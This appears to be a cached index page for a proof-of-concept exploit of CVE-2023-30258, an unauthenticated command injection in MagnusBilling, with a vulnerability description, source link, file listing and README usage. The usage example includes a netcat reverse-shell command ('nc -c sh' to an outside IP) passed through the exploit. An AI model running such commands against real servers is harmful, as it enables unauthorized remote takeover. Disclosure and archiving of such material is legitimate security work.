CVE-2023-30258 PoC — MagnusBilling 操作系统命令注入漏洞

Source

https://github.com/n00o00b/CVE-2023-30258-RCE-POC

Associated Vulnerability

Title:MagnusBilling 操作系统命令注入漏洞 (CVE-2023-30258)
Description:MagnusBilling是MagnusSolution开源的一种快速、安全、高效、高可用性的 VOIP 计费。 MagnusSolution MagnusBilling 6.x 、 7.x版本存在操作系统命令注入漏洞，该漏洞源于允许远程攻击者通过未经身份验证的 HTTP 请求运行任意命令。

Description

POC for CVE-2023-30258-RCE by n0o0b

Readme

# CVE-2023-30258-RCE-POC
POC for CVE-2023-30258-RCE by n0o0b

## Usage
```
usage: poc.py [-h] [-u URL] [-c CMD]

example. python poc.py -u http://10.10.69.34/mbilling --cmd "nc -c sh 10.21.126.163 8888"

options:
  -h, --help         show this help message and exit
  -u URL, --url URL  Target URL
  -c CMD, --cmd CMD  Command to execute
```

File Snapshot


 [4.0K]  /data/pocs/cd19269fc9bf91202f478deea238340f98e72f0a
├── [1.5K]  poc.py
└── [ 342]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!